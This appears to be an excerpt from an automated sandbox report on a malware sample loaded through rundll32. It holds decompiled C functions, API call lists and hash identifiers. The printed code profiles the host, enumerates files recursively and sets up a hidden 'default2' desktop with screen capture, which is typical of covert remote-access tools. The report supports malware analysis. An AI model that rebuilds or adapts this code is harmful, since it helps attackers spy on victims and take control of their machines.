                                                            							_t65 = _t133 + 0x1f4; // 0x1f4
                                                            							_t164 = _t65 - _t148;
                                                            							__eflags = _t164;
                                                            							do {
                                                            								_t118 =  *_t148 & 0x0000ffff;
                                                            								 *(_t148 + _t164) = _t118;
                                                            								_t148 =  &(_t148[1]);
                                                            								__eflags = _t118;
                                                            							} while (_t118 != 0);
                                                            						} else {
                                                            							_t61 = _t133 + 0x1f4; // 0x1f4
                                                            							memcpy(_t61,  &_v428, 0x32 << 2);
                                                            							_t193 = _t193 + 0xc;
                                                            							_t148 = 0;
                                                            						}
                                                            						_t165 = _a12;
                                                            						_t68 = _t133 + 0x2bc; // 0x2bc
                                                            						_t184 = _t68 - _t165;
                                                            						__eflags = _t184;
                                                            						do {
                                                            							_t119 =  *_t165 & 0x0000ffff;
                                                            							_t69 =  &(_t165[1]); // 0x0
                                                            							_t165 = _t69;
                                                            							 *(_t184 + _t165 - 2) = _t119;
                                                            							__eflags = _t119;
                                                            						} while (_t119 != 0);
                                                            						_push(_t148);
                                                            						_push(0x3f);
                                                            						_push(_v788);
                                                            						 *((intOrPtr*)(_t133 + 4)) = _a16;
                                                            						E04631C60(_v808);
                                                            						L04655B0F(_t133);
                                                            						__eflags = _v40 ^ _t193 + 0x00000004;
                                                            						return E04655AFE(_v40 ^ _t193 + 0x00000004, _t133);
                                                            					}
                                                            				} else {
                                                            					L3:
                                                            					return E04655AFE(_v8 ^ _t190);
                                                            				}
                                                            			}















































                                                            0x0464b0c0
                                                            0x0464b0c0
                                                            0x0464b0c6
                                                            0x0464b0cc
                                                            0x0464b0d3
                                                            0x0464b0da
                                                            0x0464b0df
                                                            0x0464b0e3
                                                            0x0464b0e7
                                                            0x0464b0e8
                                                            0x0464b0e9
                                                            0x0464b0ea
                                                            0x0464b0ec
                                                            0x0464b0f0
                                                            0x0464b0f5
                                                            0x0464b0f8
                                                            0x0464b0fa
                                                            0x0464b0ff
                                                            0x0464b0ff
                                                            0x0464b104
                                                            0x0464b108
                                                            0x0464b123
                                                            0x0464b128
                                                            0x0464b129
                                                            0x0464b132
                                                            0x0464b134
                                                            0x0464b137
                                                            0x0464b139
                                                            0x00000000
                                                            0x0464b13b
                                                            0x0464b141
                                                            0x0464b149
                                                            0x0464b14e
                                                            0x0464b153
                                                            0x0464b156
                                                            0x0464b158
                                                            0x0464b15c
                                                            0x0464b161
                                                            0x0464b166
                                                            0x0464b16b
                                                            0x0464b16b
                                                            0x0464b170
                                                            0x0464b174
                                                            0x0464b178
                                                            0x0464b17c
                                                            0x0464b183
                                                            0x0464b186
                                                            0x0464b18f
                                                            0x0464b19b
                                                            0x0464b1a1
                                                            0x0464b1a6
                                                            0x0464b1a8
                                                            0x0464b1ac
                                                            0x0464b1b1
                                                            0x0464b1b6
                                                            0x0464b1bb
                                                            0x0464b1bb
                                                            0x0464b1c0
                                                            0x0464b1c3
                                                            0x0464b1d7
                                                            0x0464b1d7
                                                            0x0464b1da
                                                            0x0464b1e0
                                                            0x0464b1ea
                                                            0x0464b1ea
                                                            0x0464b1f0
                                                            0x0464b1f9
                                                            0x0464b202
                                                            0x0464b209
                                                            0x0464b211
                                                            0x0464b220
                                                            0x0464b227
                                                            0x0464b22c
                                                            0x0464b230
                                                            0x0464b230
                                                            0x0464b236
                                                            0x0464b239
                                                            0x0464b241
                                                            0x0464b245
                                                            0x0464b248
                                                            0x0464b24f
                                                            0x0464b252
                                                            0x0464b257
                                                            0x0464b257
                                                            0x00000000
                                                            0x0464b257
                                                            0x0464b24a
                                                            0x0464b24a
                                                            0x0464b25a
                                                            0x0464b263
                                                            0x0464b263
                                                            0x0464b26b
                                                            0x0464b276
                                                            0x0464b28c
                                                            0x0464b294
                                                            0x0464b29c
                                                            0x0464b2bc
                                                            0x0464b2c6
                                                            0x0464b2d0
                                                            0x0464b2db
                                                            0x0464b2e3
                                                            0x0464b2fa
                                                            0x0464b300
                                                            0x0464b30d
                                                            0x0464b313
                                                            0x0464b324
                                                            0x0464b32f
                                                            0x0464b331
                                                            0x0464b349
                                                            0x0464b34c
                                                            0x0464b352
                                                            0x0464b352
                                                            0x0464b354
                                                            0x0464b354
                                                            0x0464b357
                                                            0x0464b35a
                                                            0x0464b35f
                                                            0x0464b35f
                                                            0x0464b333
                                                            0x0464b333
                                                            0x0464b33e
                                                            0x0464b345
                                                            0x0464b345
                                                            0x0464b345
                                                            0x0464b345
                                                            0x0464b36b
                                                            0x0464b370
                                                            0x0464b372
                                                            0x0464b38a
                                                            0x0464b38d
                                                            0x0464b393
                                                            0x0464b393
                                                            0x0464b395
                                                            0x0464b395
                                                            0x0464b398
                                                            0x0464b39c
                                                            0x0464b39f
                                                            0x0464b39f
                                                            0x0464b374
                                                            0x0464b374
                                                            0x0464b386
                                                            0x0464b386
                                                            0x0464b386
                                                            0x0464b386
                                                            0x0464b3a4
                                                            0x0464b3a7
                                                            0x0464b3ad
                                                            0x0464b3ad
                                                            0x0464b3b0
                                                            0x0464b3b0
                                                            0x0464b3b3
                                                            0x0464b3b3
                                                            0x0464b3b6
                                                            0x0464b3bb
                                                            0x0464b3bb
                                                            0x0464b3c3
                                                            0x0464b3c8
                                                            0x0464b3ca
                                                            0x0464b3ce
                                                            0x0464b3d2
                                                            0x0464b3da
                                                            0x0464b3ee
                                                            0x0464b3f8
                                                            0x0464b3f8
                                                            0x0464b10a
                                                            0x0464b10a
                                                            0x0464b120
                                                            0x0464b120

                                                            APIs
                                                              • Part of subcall function 046362B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,0464B6FC,?,04686318,?,?,0464B6FC), ref: 04636360
                                                              • Part of subcall function 046362B0: RegCloseKey.ADVAPI32(0464B6FC,?,04686318,?,?,0464B6FC), ref: 0463636D
                                                            • GetTickCount.KERNEL32 ref: 0464B189
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0464B195
                                                            • gethostname.WS2_32(?,00000100), ref: 0464B1DA
                                                            • GetSystemInfo.KERNEL32(?), ref: 0464B26B
                                                            • RegOpenKeyW.ADVAPI32 ref: 0464B29C
                                                            • RegQueryValueExW.ADVAPI32(00000004,~MHz,00000000,00000004,00000004,?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 0464B2BC
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 0464B2C6
                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 0464B2E3
                                                            • CoInitialize.OLE32(00000000), ref: 0464B300
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$CountCurrentGlobalInfoInitializeMemoryProcessQueryStatusSystemTickValuegethostname
                                                            • String ID: /$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                            • API String ID: 963674043-1973391949
                                                            • Opcode ID: 58cd581887cf8d695e3985f365d324baaf5ac22e92a73fc8e530af02ba69aaff
                                                            • Instruction ID: a5abf5d7616afe41f2e4e6487b0d07be3128875affbba163b238fbbee738f06e
                                                            • Opcode Fuzzy Hash: 58cd581887cf8d695e3985f365d324baaf5ac22e92a73fc8e530af02ba69aaff
                                                            • Instruction Fuzzy Hash: BE91ED716043819BDB11DF64C888BAA77E4FF88308F04466DED499B256FB34FA44CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			E046342B0(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                            				signed int _v12;
                                                            				short _v1056;
                                                            				char _v2096;
                                                            				short _v3136;
                                                            				intOrPtr _v3704;
                                                            				struct _WIN32_FIND_DATAW _v3728;
                                                            				signed int _v3732;
                                                            				long _v3736;
                                                            				intOrPtr _v3740;
                                                            				signed int _v3744;
                                                            				void* _v3748;
                                                            				signed int _t80;
                                                            				void* _t88;
                                                            				signed int _t91;
                                                            				signed int _t92;
                                                            				signed int _t99;
                                                            				signed int _t100;
                                                            				void* _t101;
                                                            				signed int _t104;
                                                            				signed int _t128;
                                                            				void* _t133;
                                                            				signed int _t137;
                                                            				signed int _t139;
                                                            				void* _t140;
                                                            				void* _t141;
                                                            				intOrPtr _t142;
                                                            				intOrPtr _t143;
                                                            				intOrPtr _t144;
                                                            				intOrPtr _t145;
                                                            				intOrPtr _t147;
                                                            				void* _t148;
                                                            				void* _t149;
                                                            				void* _t150;
                                                            				long _t152;
                                                            				void* _t153;
                                                            				long _t154;
                                                            				signed int _t155;
                                                            				void* _t156;
                                                            				void* _t157;
                                                            
                                                            				_t80 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t80 ^ _t155;
                                                            				_t147 = _a4;
                                                            				_t152 = 0x2800;
                                                            				_v3744 = __ecx;
                                                            				_v3740 = _t147;
                                                            				_v3732 = _a8;
                                                            				_v3736 = 0x2800;
                                                            				_t133 = LocalAlloc(0x40, 0x2800);
                                                            				wsprintfW( &_v3136, L"%s\\*.*", _t147);
                                                            				_t157 = _t156 + 0xc;
                                                            				_t88 = FindFirstFileW( &_v3136,  &_v3728);
                                                            				_v3748 = _t88;
                                                            				if(_t88 != 0xffffffff) {
                                                            					 *_t133 = 0x74;
                                                            					_t148 = 1;
                                                            					asm("o16 nop [eax+eax]");
                                                            					do {
                                                            						_t137 = ".";
                                                            						_t91 =  &(_v3728.cFileName);
                                                            						while(1) {
                                                            							_t140 =  *_t91;
                                                            							if(_t140 !=  *_t137) {
                                                            								break;
                                                            							}
                                                            							if(_t140 == 0) {
                                                            								L7:
                                                            								_t92 = 0;
                                                            							} else {
                                                            								_t145 =  *((intOrPtr*)(_t91 + 2));
                                                            								_t14 = _t137 + 2; // 0x2e0000
                                                            								if(_t145 !=  *_t14) {
                                                            									break;
                                                            								} else {
                                                            									_t91 = _t91 + 4;
                                                            									_t137 = _t137 + 4;
                                                            									if(_t145 != 0) {
                                                            										continue;
                                                            									} else {
                                                            										goto L7;
                                                            									}
                                                            								}
                                                            							}
                                                            							L9:
                                                            							if(_t92 != 0) {
                                                            								_t137 = L"..";
                                                            								_t99 =  &(_v3728.cFileName);
                                                            								while(1) {
                                                            									_t141 =  *_t99;
                                                            									if(_t141 !=  *_t137) {
                                                            										break;
                                                            									}
                                                            									if(_t141 == 0) {
                                                            										L15:
                                                            										_t100 = 0;
                                                            									} else {
                                                            										_t144 =  *((intOrPtr*)(_t99 + 2));
                                                            										_t17 = _t137 + 2; // 0x2e
                                                            										if(_t144 !=  *_t17) {
                                                            											break;
                                                            										} else {
                                                            											_t99 = _t99 + 4;
                                                            											_t137 = _t137 + 4;
                                                            											if(_t144 != 0) {
                                                            												continue;
                                                            											} else {
                                                            												goto L15;
                                                            											}
                                                            										}
                                                            									}
                                                            									L17:
                                                            									if(_t100 != 0) {
                                                            										_t101 = 0;
                                                            										do {
                                                            											_t137 =  *(_t155 + _t101 - 0xe60) & 0x0000ffff;
                                                            											_t101 = _t101 + 2;
                                                            											 *(_t155 + _t101 - 0x82e) = _t137;
                                                            										} while (_t137 != 0);
                                                            										if(_a12 != 0) {
                                                            											E0465F1B0( &_v2096);
                                                            											_t157 = _t157 + 4;
                                                            										}
                                                            										if(_a16 != 0 || (_v3728.dwFileAttributes & 0x00000010) == 0) {
                                                            											_t102 =  &_v2096;
                                                            											if(_a20 == 0) {
                                                            												_t139 = _v3732;
                                                            												while(1) {
                                                            													_t142 =  *_t102;
                                                            													if(_t142 !=  *_t139) {
                                                            														break;
                                                            													}
                                                            													if(_t142 == 0) {
                                                            														L31:
                                                            														_t137 = 0;
                                                            													} else {
                                                            														_t143 =  *((intOrPtr*)(_t102 + 2));
                                                            														if(_t143 !=  *((intOrPtr*)(_t139 + 2))) {
                                                            															break;
                                                            														} else {
                                                            															_t102 = _t102 + 4;
                                                            															_t139 = _t139 + 4;
                                                            															if(_t143 != 0) {
                                                            																continue;
                                                            															} else {
                                                            																goto L31;
                                                            															}
                                                            														}
                                                            													}
                                                            													L33:
                                                            													_t104 = 0 | _t137 == 0x00000000;
                                                            													goto L34;
                                                            												}
                                                            												asm("sbb ecx, ecx");
                                                            												_t137 = _t139 | 0x00000001;
                                                            												goto L33;
                                                            											} else {
                                                            												_push(_v3732);
                                                            												_push( &_v2096);
                                                            												_t128 = E0465D73B(_t137);
                                                            												_t157 = _t157 + 8;
                                                            												asm("sbb eax, eax");
                                                            												_t104 =  ~( ~_t128);
                                                            											}
                                                            											L34:
                                                            											if(_t104 != 0) {
                                                            												_t37 = _t152 - 0x410; // 0x23f0
                                                            												if(_t148 > _t37) {
                                                            													_t154 = _t152 + 0x410;
                                                            													_v3736 = _t154;
                                                            													_t133 = LocalReAlloc(_t133, _t154, 0x42);
                                                            												}
                                                            												 *(_t148 + _t133) = _v3728.dwFileAttributes & 0x00000010;
                                                            												_t149 = _t148 + 1;
                                                            												wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
                                                            												_t153 = 2 + lstrlenW( &_v1056) * 2;
                                                            												E0465E060(_t149 + _t133,  &_v1056, _t153);
                                                            												_t150 = _t149 + _t153;
                                                            												_t152 = _v3736;
                                                            												_t157 = _t157 + 0x1c;
                                                            												 *((intOrPtr*)(_t150 + _t133)) = _v3728.nFileSizeHigh;
                                                            												 *((intOrPtr*)(_t150 + _t133 + 4)) = _v3728.nFileSizeLow;
                                                            												 *((intOrPtr*)(_t150 + _t133 + 8)) = _v3728.ftLastWriteTime;
                                                            												 *((intOrPtr*)(_t150 + _t133 + 0xc)) = _v3704;
                                                            												_t148 = _t150 + 0x10;
                                                            											}
                                                            											if((_v3728.dwFileAttributes & 0x00000010) != 0) {
                                                            												goto L39;
                                                            											}
                                                            										} else {
                                                            											L39:
                                                            											E0465DEA0(_t148,  &_v1056, 0, 0x410);
                                                            											wsprintfW( &_v1056, L"%s\\%s", _v3740,  &(_v3728.cFileName));
                                                            											_t137 = _v3744;
                                                            											_t157 = _t157 + 0x1c;
                                                            											E046342B0(_t133, _t137, _t148, _t152,  &_v1056, _v3732, _a12, _a16, _a20);
                                                            										}
                                                            									}
                                                            									goto L40;
                                                            								}
                                                            								asm("sbb eax, eax");
                                                            								_t100 = _t99 | 0x00000001;
                                                            								goto L17;
                                                            							}
                                                            							goto L40;
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t92 = _t91 | 0x00000001;
                                                            						goto L9;
                                                            						L40:
                                                            					} while (FindNextFileW(_v3748,  &_v3728) != 0);
                                                            					if(_t148 > 1) {
                                                            						_push(_t137);
                                                            						_push(0x3f);
                                                            						_push(_t148);
                                                            						_push(_t133);
                                                            						E04631C60( *((intOrPtr*)(_v3744 + 4)));
                                                            					}
                                                            					LocalFree(_t133);
                                                            					FindClose(_v3748);
                                                            				}
                                                            				return E04655AFE(_v12 ^ _t155);
                                                            			}










































                                                            0x046342b9
                                                            0x046342c0
                                                            0x046342c9
                                                            0x046342cc
                                                            0x046342d4
                                                            0x046342da
                                                            0x046342e0
                                                            0x046342e6
                                                            0x046342f3
                                                            0x04634301
                                                            0x04634307
                                                            0x04634318
                                                            0x0463431e
                                                            0x04634327
                                                            0x0463432d
                                                            0x04634330
                                                            0x04634335
                                                            0x04634340
                                                            0x04634340
                                                            0x04634345
                                                            0x04634350
                                                            0x04634350
                                                            0x04634356
                                                            0x00000000
                                                            0x00000000
                                                            0x0463435b
                                                            0x04634372
                                                            0x04634372
                                                            0x0463435d
                                                            0x0463435d
                                                            0x04634361
                                                            0x04634365
                                                            0x00000000
                                                            0x04634367
                                                            0x04634367
                                                            0x0463436a
                                                            0x04634370
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04634370
                                                            0x04634365
                                                            0x0463437b
                                                            0x0463437d
                                                            0x04634383
                                                            0x04634388
                                                            0x04634390
                                                            0x04634390
                                                            0x04634396
                                                            0x00000000
                                                            0x00000000
                                                            0x0463439b
                                                            0x046343b2
                                                            0x046343b2
                                                            0x0463439d
                                                            0x0463439d
                                                            0x046343a1
                                                            0x046343a5
                                                            0x00000000
                                                            0x046343a7
                                                            0x046343a7
                                                            0x046343aa
                                                            0x046343b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046343b0
                                                            0x046343a5
                                                            0x046343bb
                                                            0x046343bd
                                                            0x046343c3
                                                            0x046343c5
                                                            0x046343c5
                                                            0x046343cd
                                                            0x046343d0
                                                            0x046343d8
                                                            0x046343e1
                                                            0x046343ea
                                                            0x046343ef
                                                            0x046343ef
                                                            0x046343f6
                                                            0x04634409
                                                            0x0463440f
                                                            0x04634428
                                                            0x04634430
                                                            0x04634430
                                                            0x04634436
                                                            0x00000000
                                                            0x00000000
                                                            0x0463443b
                                                            0x04634452
                                                            0x04634452
                                                            0x0463443d
                                                            0x0463443d
                                                            0x04634445
                                                            0x00000000
                                                            0x04634447
                                                            0x04634447
                                                            0x0463444a
                                                            0x04634450
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04634450
                                                            0x04634445
                                                            0x0463445b
                                                            0x0463445f
                                                            0x00000000
                                                            0x0463445f
                                                            0x04634456
                                                            0x04634458
                                                            0x00000000
                                                            0x04634411
                                                            0x04634411
                                                            0x04634417
                                                            0x04634418
                                                            0x0463441d
                                                            0x04634422
                                                            0x04634424
                                                            0x04634424
                                                            0x04634462
                                                            0x04634464
                                                            0x0463446a
                                                            0x04634472
                                                            0x04634474
                                                            0x0463447e
                                                            0x0463448a
                                                            0x0463448a
                                                            0x04634494
                                                            0x046344aa
                                                            0x046344b1
                                                            0x046344c7
                                                            0x046344da
                                                            0x046344e5
                                                            0x046344e7
                                                            0x046344ed
                                                            0x046344f0
                                                            0x046344f9
                                                            0x04634503
                                                            0x0463450d
                                                            0x04634511
                                                            0x04634511
                                                            0x0463451b
                                                            0x00000000
                                                            0x00000000
                                                            0x0463451d
                                                            0x0463451d
                                                            0x0463452b
                                                            0x0463454c
                                                            0x04634552
                                                            0x0463455e
                                                            0x04634571
                                                            0x04634571
                                                            0x046343f6
                                                            0x00000000
                                                            0x046343bd
                                                            0x046343b6
                                                            0x046343b8
                                                            0x00000000
                                                            0x046343b8
                                                            0x00000000
                                                            0x0463437d
                                                            0x04634376
                                                            0x04634378
                                                            0x00000000
                                                            0x04634576
                                                            0x04634589
                                                            0x04634594
                                                            0x0463459c
                                                            0x0463459d
                                                            0x0463459f
                                                            0x046345a3
                                                            0x046345a4
                                                            0x046345a4
                                                            0x046345aa
                                                            0x046345b6
                                                            0x046345b6
                                                            0x046345ce

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,00002800,?,?,?), ref: 046342EC
                                                            • wsprintfW.USER32 ref: 04634301
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 04634318
                                                            • _wcsstr.LIBVCRUNTIME ref: 04634418
                                                            • LocalReAlloc.KERNEL32(00000000,000023F0,00000042), ref: 04634484
                                                            • wsprintfW.USER32 ref: 046344B1
                                                            • lstrlenW.KERNEL32(?), ref: 046344C1
                                                            • wsprintfW.USER32 ref: 0463454C
                                                            • FindNextFileW.KERNEL32(?,?), ref: 04634583
                                                            • LocalFree.KERNEL32(00000000), ref: 046345AA
                                                            • FindClose.KERNEL32(?), ref: 046345B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FindLocalwsprintf$AllocFile$CloseFirstFreeNext_wcsstrlstrlen
                                                            • String ID: %s\%s$%s\*.*
                                                            • API String ID: 2479123022-1665845743
                                                            • Opcode ID: 7f930593d81e61e902243ef4059b972626ea11c72e920e8830ca48d29c4038c9
                                                            • Instruction ID: 4618669f431fdb626efaca9b5b43d5cdcd54cfbe47121e367d9eadb08c8145cb
                                                            • Opcode Fuzzy Hash: 7f930593d81e61e902243ef4059b972626ea11c72e920e8830ca48d29c4038c9
                                                            • Instruction Fuzzy Hash: 6E91CF719002599BEF20DF24CC44BEAB7B9FF25315F4448A5E90DA7251FB72AA84CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E046365A0(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v12;
                                                            				short _v80;
                                                            				void* _v108;
                                                            				void* _v116;
                                                            				struct tagMONITORINFO _v120;
                                                            				struct _devicemodeW _v344;
                                                            				struct _OSVERSIONINFOA _v496;
                                                            				intOrPtr _v780;
                                                            				char _v784;
                                                            				signed int _t55;
                                                            				intOrPtr _t57;
                                                            				WCHAR* _t60;
                                                            				struct HMONITOR__* _t62;
                                                            				signed int _t77;
                                                            				struct HDC__* _t83;
                                                            				struct HDC__* _t84;
                                                            				intOrPtr* _t100;
                                                            				signed int _t103;
                                                            				struct HDC__* _t104;
                                                            				signed int _t109;
                                                            				intOrPtr* _t112;
                                                            				signed int _t114;
                                                            				char* _t115;
                                                            				signed int _t116;
                                                            
                                                            				_t109 = __edx;
                                                            				_t55 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t55 ^ _t116;
                                                            				_t57 = _a4;
                                                            				_t112 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t57;
                                                            				 *((intOrPtr*)(_t57 + 0x38)) = __ecx;
                                                            				 *((intOrPtr*)(_t112 + 8)) = CreateEventW(0, 1, 0, 0);
                                                            				 *_t112 = 0x467df68;
                                                            				E04636530();
                                                            				 *(_t112 + 0x74) = 0;
                                                            				 *(_t112 + 0x78) = 0;
                                                            				 *(_t112 + 0x7c) = 0;
                                                            				 *(_t112 + 0x80) = 0;
                                                            				 *(_t112 + 0x70) = L"default2";
                                                            				_t60 = OpenDesktopW(L"default2", 0, 1, 0x10000000);
                                                            				 *(_t112 + 0xc) = _t60;
                                                            				_t125 = _t60;
                                                            				if(_t60 == 0) {
                                                            					 *(_t112 + 0xc) = CreateDesktopW( *(_t112 + 0x70), _t60, _t60, _t60, 0x10000000, _t60);
                                                            				}
                                                            				SetThreadDesktop( *(_t112 + 0xc));
                                                            				_t62 = GetDesktopWindow();
                                                            				__imp__MonitorFromWindow(_t62, 2);
                                                            				_v120.cbSize = 0x68;
                                                            				GetMonitorInfoW(_t62,  &_v120);
                                                            				_v344.dmSize = 0xdc;
                                                            				EnumDisplaySettingsW( &_v80, 0xffffffff,  &_v344);
                                                            				_t114 = _v344.dmPelsWidth;
                                                            				_t100 = _t112 + 0x38;
                                                            				asm("movd xmm1, esi");
                                                            				asm("cvtdq2pd xmm1, xmm1");
                                                            				asm("addsd xmm1, [eax*8+0x467f970]");
                                                            				asm("movd xmm0, eax");
                                                            				asm("cvtdq2pd xmm0, xmm0");
                                                            				asm("divsd xmm1, xmm0");
                                                            				asm("movsd [edi+0x68], xmm1");
                                                            				E0465DEA0(_t112, _t100, 0, 0x2c);
                                                            				_t103 = _v344.dmPelsHeight;
                                                            				 *_t100 = 0x28;
                                                            				asm("cdq");
                                                            				 *(_t112 + 0x3c) = _t114;
                                                            				 *(_t112 + 0x40) = _t103;
                                                            				 *((intOrPtr*)(_t112 + 0x44)) = 0x180001;
                                                            				 *(_t112 + 0x48) = 0;
                                                            				 *(_t112 + 0x58) = 0;
                                                            				_t77 = (0x1f + (_t114 + _t114 * 2) * 8 + (_t109 & 0x0000001f) >> 5) * _t103 << 2;
                                                            				_push(_t77);
                                                            				 *(_t112 + 0x4c) = _t77;
                                                            				 *((intOrPtr*)(_t112 + 0x10)) = L04655B55(_t103, _t114, _t125);
                                                            				_push( *(_t112 + 0x4c));
                                                            				 *((intOrPtr*)(_t112 + 0x88)) = L04655B55(_t103, _t114, _t125);
                                                            				_push( *(_t112 + 0x4c) +  *(_t112 + 0x4c));
                                                            				 *((intOrPtr*)(_t112 + 0x84)) = L04655B55(_t103, _t114, _t125);
                                                            				_t83 = GetDC(0);
                                                            				 *(_t112 + 0x14) = _t83;
                                                            				_t84 = CreateCompatibleDC(_t83);
                                                            				asm("movsd xmm0, [edi+0x68]");
                                                            				_t104 = _t84;
                                                            				 *(_t112 + 0x20) =  *(_t112 + 0x14);
                                                            				 *(_t112 + 0x18) = _t104;
                                                            				 *(_t112 + 0x24) = _t104;
                                                            				asm("movsd [edi+0x28], xmm0");
                                                            				_v496.dwOSVersionInfoSize = 0x94;
                                                            				GetVersionExA( &_v496);
                                                            				E04645A50( &_v784, _t112, _t114);
                                                            				 *((intOrPtr*)(_t112 + 0x30)) = _v784;
                                                            				_push(0x2d);
                                                            				 *((intOrPtr*)(_t112 + 0x34)) = _v780;
                                                            				_t115 = L04655B55( &_v784, _t114, _t125);
                                                            				if(_t115 != 0) {
                                                            					_t52 = _t115 + 1; // 0x1
                                                            					 *_t115 = 0xac;
                                                            					E0465E060(_t52, _t100, 0x2c);
                                                            					_push(0x3f);
                                                            					_push(0x2d);
                                                            					_push(_t115);
                                                            					E04631C60( *((intOrPtr*)(_t112 + 4)));
                                                            					L04655B0F(_t115);
                                                            				}
                                                            				return E04655AFE(_v12 ^ _t116);
                                                            			}



























                                                            0x046365a0
                                                            0x046365a9
                                                            0x046365b0
                                                            0x046365b3
                                                            0x046365bb
                                                            0x046365c3
                                                            0x046365c9
                                                            0x046365cc
                                                            0x046365d5
                                                            0x046365d8
                                                            0x046365de
                                                            0x046365f1
                                                            0x046365f8
                                                            0x046365ff
                                                            0x04636606
                                                            0x04636610
                                                            0x04636617
                                                            0x0463661d
                                                            0x04636620
                                                            0x04636622
                                                            0x04636636
                                                            0x04636636
                                                            0x0463663c
                                                            0x04636642
                                                            0x0463664b
                                                            0x04636654
                                                            0x0463665d
                                                            0x04636669
                                                            0x0463667a
                                                            0x04636680
                                                            0x04636686
                                                            0x04636690
                                                            0x04636694
                                                            0x0463669b
                                                            0x046366aa
                                                            0x046366ae
                                                            0x046366b2
                                                            0x046366b6
                                                            0x046366bb
                                                            0x046366c0
                                                            0x046366d0
                                                            0x046366d6
                                                            0x046366dd
                                                            0x046366e2
                                                            0x046366eb
                                                            0x046366f2
                                                            0x046366f9
                                                            0x04636700
                                                            0x04636703
                                                            0x04636704
                                                            0x0463670f
                                                            0x04636712
                                                            0x0463671a
                                                            0x04636728
                                                            0x04636731
                                                            0x04636739
                                                            0x04636740
                                                            0x04636743
                                                            0x04636749
                                                            0x0463674e
                                                            0x04636753
                                                            0x0463675c
                                                            0x0463675f
                                                            0x04636762
                                                            0x04636767
                                                            0x04636772
                                                            0x0463677e
                                                            0x04636789
                                                            0x04636792
                                                            0x04636794
                                                            0x0463679c
                                                            0x046367a3
                                                            0x046367a7
                                                            0x046367aa
                                                            0x046367af
                                                            0x046367ba
                                                            0x046367bc
                                                            0x046367be
                                                            0x046367bf
                                                            0x046367c5
                                                            0x046367ca
                                                            0x046367df

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 046365CF
                                                              • Part of subcall function 04636530: LoadLibraryA.KERNEL32(User32.dll,?,046365E3), ref: 04636536
                                                            • OpenDesktopW.USER32(default2,00000000,00000001,10000000), ref: 04636617
                                                            • CreateDesktopW.USER32(0467DA98,00000000,00000000,00000000,10000000,00000000), ref: 04636630
                                                            • SetThreadDesktop.USER32(?), ref: 0463663C
                                                            • GetDesktopWindow.USER32 ref: 04636642
                                                            • MonitorFromWindow.USER32(00000000,00000002), ref: 0463664B
                                                            • GetMonitorInfoW.USER32(00000000,00000000), ref: 0463665D
                                                            • EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0463667A
                                                            • GetDC.USER32(00000000), ref: 04636739
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 04636743
                                                            • GetVersionExA.KERNEL32(?), ref: 04636772
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Create$MonitorWindow$CompatibleDisplayEnumEventFromInfoLibraryLoadOpenSettingsThreadVersion
                                                            • String ID: default2$h
                                                            • API String ID: 1408810681-1613360701
                                                            • Opcode ID: 4d05dcf4b2a66dab57275c6dcc983a4597337ad7ad2eba7fa1009372112336bf
                                                            • Instruction ID: 20a206e679351d1147df4d68cce1d97b124f0ed05ce3e67d3ebdb7de68885162
                                                            • Opcode Fuzzy Hash: 4d05dcf4b2a66dab57275c6dcc983a4597337ad7ad2eba7fa1009372112336bf
                                                            • Instruction Fuzzy Hash: 7C615DB090070AAFE715DF74DC49B9ABBB8FF04304F004229E90997690EB75BA64CF94
                                                            Uniqueness

